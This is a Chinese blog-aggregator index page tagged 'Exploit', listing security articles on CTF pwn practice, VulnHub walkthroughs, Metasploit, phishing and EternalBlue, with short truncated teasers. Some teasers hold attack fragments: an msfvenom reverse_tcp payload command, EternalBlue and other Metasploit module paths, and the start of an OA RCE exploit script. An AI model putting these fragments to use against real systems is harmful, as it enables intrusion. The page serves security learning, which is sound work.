Exploit

你所不知道的黑客工具之 EK 篇

EK(Exploitkits)是指一套利用恶意软件感染用户电脑发起攻击的黑客工具,时下最著名的有AnglerEK、FiestaEK、HanjuanEK、NuclearEK、NeutrinoEK。
OneAPM蓝海讯通·2020-08-22 09:42

当随机不够随机:一个在线扑克游戏的教训

英文原文:WhenRandomIsn'tRandomEnough:LessonsfromanOnlinePokerExploit今天我要讲一个发生于1999年,一个很流行的在线扑克平台的开发者开发的洗牌软件
原文链接·2020-08-22 02:34

Exploit-Exercise之Nebula实践指南(一)

前言本系列文章为https://exploit-exercises.com网站Nebula关卡的通关实践指南。Nebula关卡分为19部分,文章中以00~19标识。
合天智汇·2020-08-21 22:53

社会工程学攻击案例-网站钓鱼

该攻击方式需要执行以下三个步骤:1、ARP欺骗2、域名劫持3、网站克隆BT5实现1、启动社会工程学攻击集root@bt:~#cd/pentest/exploits/setro
Goallegoal·2020-08-21 20:08

通达OA v11.6 RCE漏洞分析

)比较好奇为什么要删除文件这里从exp着手分析importrequeststarget="http://10.6.6.91:7890/"payload=""print("[*]Warning,ThisexploitcodewillDELETEauth.inc.phpwhichmaydamagetheOA
z1feiyu·2020-08-21 18:17

社会工程学攻击案例-邮件钓鱼

社会工程学攻击案例-邮件钓鱼BT5实现root@bt:~#cd/pentest/exploits/setroot@bt:/pentest/exploits/set#.
Goallegoal·2020-08-21 17:21

webhooks与jenkins配合使用时提示:HTTPStatus403-Novalidcrumbwasincludedintherequest

在使用了反向代理,并且在jenkins设置中勾选了“防止跨站点请求伪造(PreventCrossSiteRequestForgeryexploits)”之后此token会被转发服务器apache/nginx
xuirzhao·2020-08-21 11:33

Python遇到ModuleNotFoundError: No module named 'email.mime'; 'email' is not a package问题的处理办法...

写Python的时候我们会遇到如下的错误:Traceback(mostrecentcalllast):File"F:/exploitation/codes/python/Jet-python1/python_code
weixin_30521649·2020-08-21 10:11

Hacking HP Printers for Fun & Profit

Printerhackingandexploitingisavaluableskilltohaveonapenetrationtest.Thereasonisthatmostallprintersareconnectedtothenetworkoravailablev
qq_27446553·2020-08-21 09:24

Burning the bridge: Cisco IOS exploits

therearestackbasedoverflowsinCiscoIOS.OneofthemistheHTTPstackvulnerability(Ciscosecuritynoticehere),whichcanbeexploitedstableusingtheUDPechomemoryl
iiprogram·2020-08-21 09:38

缓冲区溢出攻击实训

缓冲区溢出攻击实训实验网址:https://seedsecuritylabs.org/Labs_16.04/Software/Buffer_Overflow/(实验所用源码对应:exploit.c、stack.c
superboy_ZJC·2020-08-21 05:39

Vulnhub靶机 kioptrix level 3

简介里说了先要配置hosts找靶机扫端口8022登录界面LotusCMS搜漏洞searchsploitLotus直接msf设置RHOSTS、URIsearchlotususeexploit/multi/
菜浪马废·2020-08-21 01:42

Vuluhb靶机 Kioptrix Level 1

靶机1372280111394431024端口这个靶机有两种解法解法一sambamsf查找samba漏洞msfconsolesearchsamba使用漏洞查看配置情况完整配置useexploit/linux
菜浪马废·2020-08-21 01:11

No.40-VulnHub-Escalate_Linux: 1-Walkthrough渗透学习

该计算机的主要重点是学习LinuxPostExploitation(
大余xiyou·2020-08-21 01:14

利用SvnExploit Dump源代码

利用SvnExploitDump源代码1、下载SvnExploit2、SvnExploit使用  当svn版本大于1.2时,SeaySVN源代码利用工具无法直接查看源代码文件,这时可以使用SvnExploit
SheXinK·2020-08-20 22:49

渗透测试之DeRPnStiNK

可以尝试爆破或者搜索exploit库看是否存在相关漏洞。对web服务进行扫描:应该存在phpmyadmin和wp两个程序。先查看首页,获取到flag1:之后使用弱口令尝试phpmyadmin失败。
csdnPM250·2020-08-20 22:10

『VulnHub系列』hackNos: Os-hackNos-Walkthrough

靶机地址难度:作者的定义是中等~靶机发布日期:2019年11月3日靶机描述:Difficulty:IntermediateFlag:boot-rootLearning:exploit|webapplicationSecurity
1nsIght·2020-08-20 21:43

栈溢出攻击(2)-ROP基础(1)

shell的代码获取shellret2shellcode攻击目标简单fuzz查看保护机制调试程序确定与返回地址的偏移获取shellpythonljustshellcode获取shell的payloadexploit
BurningTeng·2020-08-20 06:46

通达OA 最新0day RCE 漏洞 附带EXP

利用脚本来源于网络禁止进行非法攻击仅用于工作和学习,禁止用于非法攻击,非法传播importrequeststarget="http://127.0.0.1:8888/"payload=""print("[*]Warning,Thisexploit
god_zZz·2020-08-20 00:15

溢出执行 ret2libc技术

ret2libc技术这是我们要进行溢出实验的C程序:#includevoidexploit(){system("/bin/sh");}voidfunc(){charstr[0x20];read(0,str
菜鸡CaiH·2020-08-19 22:47

JIT引擎触发RowHammer可行性研究

xlab·2015/05/2615:460x00前言作者:R3dF09@腾讯玄武实验室2015年3月GoogleProjectZero发表文章ExploitingtheDRAMrowhammerbugtogainkernelprivileges
weixin_34120274·2020-08-19 21:31

【10.21总结】一个渗透测试练习实例——发现未知的漏洞(Race condition)

Write-up地址:Exploitinganunknownvulnerability作者:AbhishekBundela这篇文章跟我之前看到的文章不太一样,作者是按照一个练习的方式简单描述了他对一个应用进行渗透测试的过程
weixin_30886233·2020-08-19 21:05

linux kernel pwn学习之堆漏洞利用+bypass smap、smep

LinuxkernelHeapexploitLinux内核使用的是slab/slub分配器,与glibc下的ptmalloc有许多类似的地方。
haivk·2020-08-19 19:33

pwn学习---attach调试与ret2libc

0x01attach调试我们将4.c文件编译成41.exe,然后使用python脚本运行C语言程序如下:#includevoidexploit(){system("/bin/sh");}voidmain
gclome·2020-08-19 19:14

Buffer Overflow Exploit

IntroductionIaminterestedinexploitingbinaryfiles.ThefirsttimeIcameacrossthebufferoverflowexploit,Icouldn'tactuallyimplementit.Manyoftheexistingsourcesonthewebwereoutdated
Omni-Space·2020-08-19 18:34

MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)

/usr/bin/python#Remoteexploitforthe0dayWindowsDNSRPCservicevulnerabilityas#describedin[url]http://www.securityfocus.com
iiprogram·2020-08-19 17:49

CVE-2017-3248简单复现

我是这样操作的目标跟windows在一个段,linux是另一个段的,我的虚拟机windows主机上`java-cpysoserial.jarysoserial.exploit.JRMPListener1099CommonsCollections5
ddr12231·2020-08-19 17:04

Lab1 Buffer OverFlow

LabOverViewImportantNote:Thiscourse’slabs,includingthislab,askyoutodesignexploitsandtoperformattacks.Theseexploitsandattacksarerealisticenoughthatyoumightbeabletousethemtoperformareal-worldattack
Thare_Lam·2020-08-19 16:04

Stack Based Windows Buffer Overflow Tutorial

IntroductionOnethingIhavealwaysmaintainedisthataspiringorpracticingpenetrationtesterswhouseanexploitationproduct
weixin_34072159·2020-08-19 16:25

3.26日每日一词inertia

Thecity'stourismresourcesdidn’texploitbecauseofitsgovernmentalinertia.
霄肖·2020-08-19 10:32

线程池的原理和实现c语言

线程池原理及实现1、线程池简介对于线程池,wiki上面这样描述Athreadpoolisatechniquethatallowsdeveloperstoexploittheconcurrencyofmodernprocessorsinaneasyandefficientmanner.It
JJ新城·2020-08-19 05:05

基于内容的图像检索技术(3):部分论文阅读总结

[1]NgYH,YangF,DavisLS.ExploitingLocalFeaturesfromDeepNetworksforImageRetrieval[J].2015.传统的VLAD算法从sift
张叫张大卫·2020-08-19 05:49

周报(1):WordSup、FTSN、R-FCN、FCIS(2020-8-1)

WordSup《WordSup:ExploitingWordAnnotationsforCharacterbasedTextDetection》Motivation对于很多语言和数学公式,字符是它们的基本组成单元
linjiet·2020-08-19 03:52

格式化字符串漏洞利用 五、爆破

五、爆破原文:ExploitingFormatStringVulnerabilities作者:[email protected]译者:飞龙日期:2001.9.1版本:v1.2当利用这种漏洞,例如缓冲区溢出或者格式化字符串漏洞时
布客飞龙·2020-08-18 23:15

metasploit

进入终端:msfconsole查看漏洞:searchms10-046(漏洞名称)查看具体年份漏洞:searchcve:2018查看具体类型:searchtype:exploit使用攻击模块:use+查看漏洞中的模块查看使用漏洞需要哪些参数
weixin_42727740·2020-08-18 23:51

metasploit 下利用永恒之蓝攻击靶机win7

实验环境:一台win7靶机,kali作为攻击机控制台下输入msfconsolesearchms17-010useexploit/windows/smb/ms17_010_eternalblue接下来可以看一下受这个漏洞影响的操作系统可以看出受影响的有两个
weixin_34061482·2020-08-18 22:39

MS17_010永恒之蓝实战攻击

这里先利用shadowbrokers的“官方”漏洞poc程序exe进行exploit。然后Doublepulsar将meterpreter-shell的dll注入到远程主机的系统进程当中。
uiop_uiop_uiop·2020-08-18 22:15

格式化字符串漏洞利用

学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/https://veritas501.space/2017
xiaoyuyulala·2020-08-18 21:05

给kali的Metasploit下添加一个新的exploit

注意头文件classMetasploit3'securitytest','Description'=>%q{Thismoduleexploitsabufferoverflow.},'Author'=>'
qq_27446553·2020-08-18 21:24

Metasploit文件目录与入侵基本概念

漏洞攻击(exploit)黑客利用一个安全缺陷进入系统当中,本质上就是一些恶意的代码数据包,借助这些代码黑客可以入侵某台机器。
si1ence_whitehat·2020-08-18 21:48

kali下的metaspolit实验1

本文章仅为督促本人学习第一个实验exploit模块:exploit/multi/samba/usermap_scriptkali版本:2017.2最新版虚拟机网络配置:kali网络配置:靶机:Metaspolit_ubuntu
勿喋·2020-08-18 20:26

格式化字符串漏洞利用 七、工具

七、工具原文:ExploitingFormatStringVulnerabilities作者:[email protected]译者:飞龙日期:2001.9.1版本:v1.2一旦利用完成,或者甚至在利用开发过程中
布客飞龙·2020-08-18 19:55

OpenMRS反序列化漏洞(CVE-2018-19276)

参考:https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/https://www.exploit-db.com
caiqiiqi·2020-08-18 19:14

Joomla-3.4.6远程代码执行漏洞利用与分析

0x02漏洞简介在exploit-db(https://www.e
Adminxe·2020-08-18 18:00

crash bug 分析

security_bprm_checkhookssuccess[494.253444]do_sys_openhookssuccess[494.255155]kerneltriedtoexecuteNX-protectedpage-exploitattempt
danielliu861·2020-08-18 15:49

利用Metasploit制作PDF木马

实验过程:一、攻击机端:1.查看自己的ip地址:ifconfig2.进入metasploit控制台:msfconsole3.利用PDF文件漏洞(Adobe公司之前发布的一个漏洞):useexploit/
____-7·2020-08-18 02:35

MSF-Shellcode生成和MS15-020 渗透利用

A.msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.86.130LPORT=4444-fexe>/qq.exe2、重新打开一个配置窗口useexploit
Tee.·2020-08-17 20:46

pwn的一些环境搭建

pwntools库安装pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit
weixin_30871905·2020-08-17 16:36

Ubuntu 16.04 for Pwn

在此列出自己做pwn题的虚拟机ubuntu配置,更加期待WSL2上线后,使用docker部署pwn环境做题主要工具:vim:安装插件,为后续编写exploitpeda:gdb插件,调试神器,谁用谁知道pwngdb
weixin_30799995·2020-08-17 16:03

Windows exploit初探-通过修改seh get shell

原文地址:https://www.fuzzysecurity.com/tutorials/expDev/3.html发现看雪有翻译的:https://bbs.pediy.com/user-686289-2.htm有漏洞的软件链接:https://pan.baidu.com/s/1XIVgoo7t2kCwbd1wZLJ7Zw提取码:khmh在xp虚拟机里安装上面下载的安装包,然后用下面的脚本创建一个
fkbugs·2020-08-17 14:33
上一页 12 13 14 15 16 17 18 19 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他